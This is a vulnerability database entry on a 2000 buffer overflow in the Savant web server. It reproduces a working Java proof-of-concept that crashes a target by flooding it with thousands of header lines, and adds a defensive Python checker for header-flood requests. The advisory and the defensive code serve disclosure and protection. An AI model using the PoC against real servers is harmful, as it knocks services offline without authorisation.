Savant Web Server Arbitrary Command Execution Vulnerability


Vulnerability ID: 1105924
Vulnerability type: Unknown
Published: 2000-07-03
Updated: 2005-05-02
CVE ID: CVE-2000-0641
CNNVD ID: CNNVD-200007-017
Platform: Windows
CVSS score: 7.5
| Vulnerability source
https://www.exploit-db.com/exploits/20066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200007-017
| Vulnerability details
A vulnerability exists in the Savant web server. A remote attacker can execute arbitrary commands by means of an overly long GET request.
| Exploit
source: http://www.securityfocus.com/bid/1453/info

A buffer overflow exists in the Savant Web Server. It is possible to exploit this overflow by sending an unusually long GET request to the server.


/* The MDMA Crew's proof-of-concept code for the buffer overflow in Savant
 * Written by Wizdumb <[email protected] || www.mdma.za.net/fk>
 *
 * The overflow occurs when the server receives too many headers in the GET
 * request. The results of the attack look something like...
 *
 * SAVANT caused an invalid page fault
 * in module KERNEL32.DLL at 015f:bff87eb5.
 *
 * Registers:
 *
 * EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010212
 * EBX=0119ff90 SS=0167 ESP=0109ffc4 EBP=010a0030
 * ECX=010a01e4 DS=0167 ESI=8162f198 FS=20f7
 * EDX=bff76859 ES=0167 EDI=010a020c GS=0000
 *
 * Bytes at CS:EIP:
 * 53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
 *
 * Stack dump:
 *
 * Enjoy!
 * Andrew Lewis aka. Wizdumb [03/07/2000]
 */

import java.io.*;
import java.net.*;

class savantstack {

  public static void main(String[] args) throws IOException {

    if (args.length != 1) {
      System.out.println("Syntax: java savantstack [hostname/ip]");
      System.exit(1);
    }

    Socket soq = null;
    PrintWriter white = null;

    int i = 5000; // This should do fine :-)

    soq = new Socket(args[0], 80);
    white = new PrintWriter(soq.getOutputStream(), true);

    System.out.print("Showing " + args[0] + " the phj33r :P ...");
    // Request line on its own line, then i bogus "A:A" header lines
    white.println("GET /index.html HTTP/1.0");
    for (int x = 0; x < i; x++) white.println("A:A");
    white.println(); // blank line terminates the header block
    System.out.println("Done!");

    white.close();
    soq.close();
  }
}
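The PoC above crashes the server with a flood of thousands of tiny header lines. The defensive counterpart is to bound the request head before it ever reaches a fragile parser; the following is an added example (not part of the original entry or the Savant code base) that checks a raw HTTP request head against header-count and size limits and rejects a request shaped like the PoC. The limit values and the sample requests are constructed for illustration.

```python
import re

# Illustrative limits, in the spirit of what hardened HTTP servers enforce
# today (a few dozen to a hundred header fields, a head of a few KiB).
MAX_HEADER_COUNT = 100
MAX_HEAD_BYTES = 8192
MAX_LINE_BYTES = 4096

REQUEST_LINE = re.compile(rb"^[A-Z]+ \S+ HTTP/1\.[01]$")


def check_request_head(raw: bytes) -> tuple:
    """Inspect only the request head (up to the blank line) and reject
    requests whose shape matches a header-flood attempt. Returns (ok, reason)."""
    if len(raw) > MAX_HEAD_BYTES:
        return False, "head too large (%d bytes)" % len(raw)
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:                       # tolerate bare-LF clients
        head, sep, _body = raw.partition(b"\n\n")
    if not sep:
        return False, "no end of headers"
    lines = head.replace(b"\r\n", b"\n").split(b"\n")
    if not REQUEST_LINE.match(lines[0]):
        return False, "malformed request line"
    headers = lines[1:]
    if len(headers) > MAX_HEADER_COUNT:
        return False, "too many headers (%d)" % len(headers)
    for line in headers:
        if len(line) > MAX_LINE_BYTES:
            return False, "header line too long"
        if b":" not in line:
            return False, "malformed header line"
    return True, "ok"


def poc_like_request(n_headers: int = 5000) -> bytes:
    """Constructed sample with the shape of the PoC above: one request line,
    n_headers copies of 'A:A', then the terminating blank line."""
    return b"GET /index.html HTTP/1.0\r\n" + b"A:A\r\n" * n_headers + b"\r\n"


# Constructed benign request for comparison.
BENIGN_REQUEST = (b"GET /index.html HTTP/1.0\r\n"
                  b"Host: savant.example\r\n"
                  b"User-Agent: constructed-sample\r\n\r\n")

if __name__ == "__main__":
    print(check_request_head(BENIGN_REQUEST))
    print(check_request_head(poc_like_request()))
```

With the PoC's 5000 headers the size limit fires first; a smaller flood (for example 200 headers) is still caught by the header-count limit.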
| References

Source: XF
Name: savant-get-bo
Link: http://xforce.iss.net/static/4901.php
Source: BID
Name: 1453
Link: http://www.securityfocus.com/bid/1453
Source: BUGTRAQ
Name: 20000708 gnu-pop3d (FTGate problem), Savant Webserver, GuildFTPd
Link: http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.html
